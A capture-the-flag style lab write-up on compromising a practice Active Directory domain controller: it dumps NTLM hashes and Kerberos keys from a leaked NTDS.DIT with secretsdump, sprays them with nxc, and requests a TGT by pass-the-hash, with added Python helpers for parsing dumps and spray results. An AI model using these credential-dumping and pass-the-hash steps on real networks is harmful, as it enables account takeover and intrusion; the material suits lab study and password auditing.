Hashdump
Registry hive files as well as the NTDS.DIT file were discovered in the Password Audit share. Those files have been downloaded to Kali for dumping hashes.
┌──(kali㉿kali)-[~/…/PG_PRACTICE/resourced/smb/Password Audit]
└─$ impacket-secretsdump local -system registry/SYSTEM -security registry/SECURITY -ntds Active\ Directory/ntds.dit
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:507fdb105d9322cf53420c95780adf5f2dcdac7ca14f8b37188370c916a3fa6f2a511bb284aeac71211c939a866a2b4cc02c408e1d242ad4f5cc8f7b85d2448c18d23fb47f7b9b543a6cfb8999e40037f23dbfd8690869753979d15fe61bdcddb0ccff3d20c275207ca93e844c3b5aa1f658198225b3e54f90e0b71aaf76ba32bb1b598d189b6696c27d04674fd4c4f2c09d0df2e59fe93850aa928be813be3bd659f0d2ecba6e34fb5a3880db8155cf77e21eb44d63e1ae65abcc2aa5bdfb6bfe85e8590329929522aae501ba86d8622918e37b41daef8a2b00e78440d13e88a31fc14714923bba6fb99e13c81b3020
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d
[*] DPAPI_SYSTEM
dpapi_machinekey:0x85ec8dd0e44681d9dc3ed5f0c130005786daddbd
dpapi_userkey:0x22043071c1e87a14422996eda74f2c72535d4931
[*] NL$KM
0000 31 BF AC 76 98 3E CF 4A FC BD AD 0F 17 0F 49 E7 1..v.>.J......I.
0010 DA 65 A6 F9 C7 D4 FA 92 0E 5C 60 74 E6 67 BE A7 .e.......\`t.g..
0020 88 14 9D 4D E5 A5 3A 63 E4 88 5A AC 37 C7 1B F9 ...M..:c..Z.7...
0030 53 9C C1 D1 6F 63 6B D1 3F 77 F4 3A 32 54 DA AC S...ock.?w.:2T..
NL$KM:31bfac76983ecf4afcbdad0f170f49e7da65a6f9c7d4fa920e5c6074e667bea788149d4de5a53a63e4885aac37c71bf9539cc1d16f636bd13f77f43a3254daac
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
[*] Kerberos keys from Active Directory/ntds.dit
Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8
Administrator:aes128-cts-hmac-sha1-96:b4fc11e40a842fff6825e93952630ba2
Administrator:des-cbc-md5:80861f1a80f1232f
RESOURCEDC$:aes256-cts-hmac-sha1-96:b97344a63d83f985698a420055aa8ab4194e3bef27b17a8f79c25d18a308b2a4
RESOURCEDC$:aes128-cts-hmac-sha1-96:27ea2c704e75c6d786cf7e8ca90e0a6a
RESOURCEDC$:des-cbc-md5:ab089e317a161cc1
krbtgt:aes256-cts-hmac-sha1-96:12b5d40410eb374b6b839ba6b59382cfbe2f66bd2e238c18d4fb409f4a8ac7c5
krbtgt:aes128-cts-hmac-sha1-96:3165b2a56efb5730cfd34f2df472631a
krbtgt:des-cbc-md5:f1b602194f3713f8
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
[*] Cleaning up...
These hashes might still be valid.
Validation
I will be brute-forcing hashes
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ cat ntlm_hashes.txt
aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d
aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d
aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b
aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45
aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c
aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808
aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726
aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c
aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939
aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe
aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac
aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35
aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2
These are the NTLM hashes (LM:NT pairs) extracted from the hashdump earlier.
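The hash list above was pulled out of the secretsdump output by hand. As an added example (not part of the original writeup or of Impacket), the script below parses the `user:rid:lmhash:nthash:::` lines and the Kerberos key lines from a secretsdump text, rebuilds the users/hashes lists in the layout used for nxc, and runs the checks a password audit of an NTDS dump would normally include: accounts whose NT hash is the hash of the empty string, accounts that still have an LM hash stored, and accounts sharing the same NT hash (password reuse). The sample input reuses lines from the dump above plus two constructed accounts (`T.Test`, `Legacy.Svc`) added only to exercise the reuse and LM checks; the hashes on those two lines are the well-known LM/NT hashes of the string "password" and a copy of an existing NT hash, not values from the target.

```python
import re
from collections import defaultdict

# Well-known constants: the LM hash stored when LM hashing is disabled
# (the LM hash of an empty password) and the NT hash of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump "Dumping Domain Credentials" line: user:rid:lmhash:nthash:::
CRED_RE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)
# secretsdump "Kerberos keys" line: user:enctype:hexkey
KRB_RE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<etype>(?:aes256|aes128)-cts-hmac-sha1-96|des-cbc-md5):(?P<key>[0-9a-f]+)$"
)

# Constructed sample: lines taken from the dump above plus two constructed
# accounts (T.Test reuses L.Livingstone's NT hash, Legacy.Svc has an LM hash).
SAMPLE = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
T.Test:1113:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
Legacy.Svc:1114:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Kerberos keys from Active Directory/ntds.dit
Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8
Administrator:aes128-cts-hmac-sha1-96:b4fc11e40a842fff6825e93952630ba2
Administrator:des-cbc-md5:80861f1a80f1232f
[*] Cleaning up...
"""


def parse_secretsdump(text):
    """Return ({user: {rid, lm, nt}}, {user: {enctype: key}}) from secretsdump output."""
    creds, keys = {}, defaultdict(dict)
    for raw in text.splitlines():
        line = raw.strip()
        m = CRED_RE.match(line)
        if m:
            creds[m["user"]] = {"rid": int(m["rid"]), "lm": m["lm"], "nt": m["nt"]}
            continue
        m = KRB_RE.match(line)
        if m:
            keys[m["user"]][m["etype"]] = m["key"]
    return creds, dict(keys)


def audit(creds):
    """Hygiene findings: empty passwords, stored LM hashes, NT hash reuse."""
    findings = []
    by_nt = defaultdict(list)
    for user, c in creds.items():
        by_nt[c["nt"]].append(user)
        if c["nt"] == EMPTY_NT:
            findings.append((user, "empty password (NT hash of the empty string)"))
        if c["lm"] != EMPTY_LM:
            findings.append((user, "LM hash stored (LM hashing not disabled)"))
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append((", ".join(sorted(users)), "same NT hash: password reuse"))
    return findings


def spray_lists(creds):
    """users/hashes in RID order, in the layout the writeup fed to nxc -u/-H."""
    users = sorted(creds, key=lambda u: creds[u]["rid"])
    hashes = [f'{creds[u]["lm"]}:{creds[u]["nt"]}' for u in users]
    return users, hashes


if __name__ == "__main__":
    creds, keys = parse_secretsdump(SAMPLE)
    users, hashes = spray_lists(creds)
    with open("users.txt", "w") as f:
        f.write("\n".join(users) + "\n")
    with open("ntlm_hashes.txt", "w") as f:
        f.write("\n".join(hashes) + "\n")
    for who, what in audit(creds):
        print(f"{who}: {what}")
```

Run it on a saved secretsdump output instead of the embedded sample by reading the file into `parse_secretsdump`; the reuse check is the one that pays off on real dumps, since accounts sharing an NT hash share a password and a single cracked or validated hash then covers all of them.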
NTLM
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ nxc smb ResourceDC.resourced.local -d RESOURCED.LOCAL -u ./users.txt -H ./ntlm_hashes.txt --continue-on-success
SMB 192.168.169.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
[...REDACTED...]
SMB 192.168.169.175 445 RESOURCEDC [-] RESOURCED.LOCAL\Guest:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED
SMB 192.168.169.175 445 RESOURCEDC [-] RESOURCED.LOCAL\M.Mason:3105e0f6af52aba8e11d19f27e487e45 STATUS_PASSWORD_EXPIRED
SMB 192.168.169.175 445 RESOURCEDC [-] RESOURCED.LOCAL\K.Keen:204410cc5a7147cd52a04ddae6754b0c STATUS_PASSWORD_EXPIRED
SMB 192.168.169.175 445 RESOURCEDC [+] RESOURCED.LOCAL\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
SMB 192.168.169.175 445 RESOURCEDC [-] RESOURCED.LOCAL\J.Johnson:3e028552b946cc4f282b72879f63b726 STATUS_PASSWORD_EXPIRED
SMB 192.168.169.175 445 RESOURCEDC [+] RESOURCED.LOCAL\V.Ventz:913c144caea1c0a936fd1ccb46929d3c
SMB 192.168.169.175 445 RESOURCEDC [-] RESOURCED.LOCAL\S.Swanson:bd7c11a9021d2708eda561984f3c8939 STATUS_PASSWORD_EXPIRED
SMB 192.168.169.175 445 RESOURCEDC [-] RESOURCED.LOCAL\P.Parker:980910b8fc2e4fe9d482123301dd19fe STATUS_PASSWORD_EXPIRED
SMB 192.168.169.175 445 RESOURCEDC [-] RESOURCED.LOCAL\R.Robinson:fea5a148c14cf51590456b2102b29fac STATUS_PASSWORD_EXPIRED
SMB 192.168.169.175 445 RESOURCEDC [-] RESOURCED.LOCAL\D.Durant:08aca8ed17a9eec9fac4acdcb4652c35 STATUS_PASSWORD_EXPIRED
SMB 192.168.169.175 445 RESOURCEDC [-] RESOURCED.LOCAL\G.Goldberg:62e16d17c3015c47b4d513e65ca757a2 STATUS_PASSWORD_EXPIRED
- The l.livingstone user credential hash is valid: 19a3a7550ce8c505c2d46b5e39d6f808
- Lots of users with STATUS_PASSWORD_EXPIRED
- Technically, this would mean that I can reset the password of those users
Kerberos
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ nxc smb ResourceDC.resourced.local -d RESOURCED.LOCAL -u ./users.txt -H ./ntlm_hashes.txt --continue-on-success -k --kdcHost ResourceDC.resourced.local
SMB ResourceDC.resourced.local 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
[...REDACTED...]
SMB ResourceDC.resourced.local 445 RESOURCEDC [-] RESOURCED.LOCAL\M.Mason:3105e0f6af52aba8e11d19f27e487e45 KDC_ERR_KEY_EXPIRED
SMB ResourceDC.resourced.local 445 RESOURCEDC [-] RESOURCED.LOCAL\K.Keen:204410cc5a7147cd52a04ddae6754b0c KDC_ERR_KEY_EXPIRED
SMB ResourceDC.resourced.local 445 RESOURCEDC [+] RESOURCED.LOCAL\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
SMB ResourceDC.resourced.local 445 RESOURCEDC [+] RESOURCED.LOCAL\V.Ventz:913c144caea1c0a936fd1ccb46929d3c
SMB ResourceDC.resourced.local 445 RESOURCEDC [-] RESOURCED.LOCAL\S.Swanson:bd7c11a9021d2708eda561984f3c8939 KDC_ERR_KEY_EXPIRED
SMB ResourceDC.resourced.local 445 RESOURCEDC [-] RESOURCED.LOCAL\P.Parker:980910b8fc2e4fe9d482123301dd19fe KDC_ERR_KEY_EXPIRED
SMB ResourceDC.resourced.local 445 RESOURCEDC [-] RESOURCED.LOCAL\R.Robinson:fea5a148c14cf51590456b2102b29fac KDC_ERR_KEY_EXPIRED
SMB ResourceDC.resourced.local 445 RESOURCEDC [-] RESOURCED.LOCAL\D.Durant:08aca8ed17a9eec9fac4acdcb4652c35 KDC_ERR_KEY_EXPIRED
SMB ResourceDC.resourced.local 445 RESOURCEDC [-] RESOURCED.LOCAL\G.Goldberg:62e16d17c3015c47b4d513e65ca757a2 KDC_ERR_KEY_EXPIRED
The same result is seen when authenticating against the target KDC with Kerberos: the accounts that returned STATUS_PASSWORD_EXPIRED over NTLM return KDC_ERR_KEY_EXPIRED here.
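The NTLM and Kerberos runs above are easier to compare side by side than by reading the two logs. As an added example (not part of the original writeup or of nxc), the script below parses nxc smb result lines, records each account's outcome per protocol, and lists the accounts that authenticate over both, which is the set worth the TGT step that follows. The sample log lines are a constructed subset copied from the two runs above; the status-code pairing (STATUS_PASSWORD_EXPIRED over NTLM corresponds to KDC_ERR_KEY_EXPIRED from the KDC) is used only to label the rows.

```python
import re

# nxc smb result line: "SMB <host> <port> <name> [+|-] DOMAIN\user:hash [STATUS]"
NXC_RE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+\[(?P<ok>[+-])\]\s+"
    r"(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<hash>[0-9a-f]{32})"
    r"(?:\s+(?P<status>\S+))?"
)

# NTLM status codes and the Kerberos KDC errors that express the same condition.
EQUIVALENT = {"STATUS_PASSWORD_EXPIRED": "KDC_ERR_KEY_EXPIRED"}

# Constructed sample: a subset of the NTLM and Kerberos runs shown above.
NTLM_LOG = r"""
SMB 192.168.169.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB 192.168.169.175 445 RESOURCEDC [-] RESOURCED.LOCAL\Guest:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED
SMB 192.168.169.175 445 RESOURCEDC [-] RESOURCED.LOCAL\M.Mason:3105e0f6af52aba8e11d19f27e487e45 STATUS_PASSWORD_EXPIRED
SMB 192.168.169.175 445 RESOURCEDC [+] RESOURCED.LOCAL\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
SMB 192.168.169.175 445 RESOURCEDC [+] RESOURCED.LOCAL\V.Ventz:913c144caea1c0a936fd1ccb46929d3c
"""
KERB_LOG = r"""
SMB ResourceDC.resourced.local 445 RESOURCEDC [-] RESOURCED.LOCAL\M.Mason:3105e0f6af52aba8e11d19f27e487e45 KDC_ERR_KEY_EXPIRED
SMB ResourceDC.resourced.local 445 RESOURCEDC [+] RESOURCED.LOCAL\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
SMB ResourceDC.resourced.local 445 RESOURCEDC [+] RESOURCED.LOCAL\V.Ventz:913c144caea1c0a936fd1ccb46929d3c
"""


def parse_nxc(text):
    """Map user -> 'VALID' or the failure status reported by nxc."""
    results = {}
    for raw in text.splitlines():
        m = NXC_RE.match(raw.strip())
        if not m:
            continue  # banner lines and anything that is not a result line
        results[m["user"]] = "VALID" if m["ok"] == "+" else (m["status"] or "FAILED")
    return results


def compare(ntlm, kerberos):
    """user -> (ntlm_outcome, kerberos_outcome, consistent?) for every user seen."""
    rows = {}
    for user in sorted(set(ntlm) | set(kerberos), key=str.lower):
        n, k = ntlm.get(user, "n/a"), kerberos.get(user, "n/a")
        consistent = (n == k) or (EQUIVALENT.get(n) == k)
        rows[user] = (n, k, consistent)
    return rows


def usable(rows):
    """Accounts whose hash authenticated over both NTLM and Kerberos."""
    return [u for u, (n, k, _) in rows.items() if n == "VALID" and k == "VALID"]


if __name__ == "__main__":
    rows = compare(parse_nxc(NTLM_LOG), parse_nxc(KERB_LOG))
    for user, (n, k, ok) in rows.items():
        print(f"{user:16} ntlm={n:24} kerberos={k:20} consistent={ok}")
    print("usable:", usable(rows))
```

Accounts marked inconsistent (different outcomes that are not a known NTLM/Kerberos pair) are the ones to re-check by hand, since a mismatch usually means a protocol restriction on the account or a KDC that was not reached rather than a bad hash.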
TGT
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-getTGT RESOURCED.LOCAL/l.livingstone@ResourceDC.resourced.local -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in l.livingstone@ResourceDC.resourced.local.ccache
Validated
A TGT was generated for the l.livingstone user.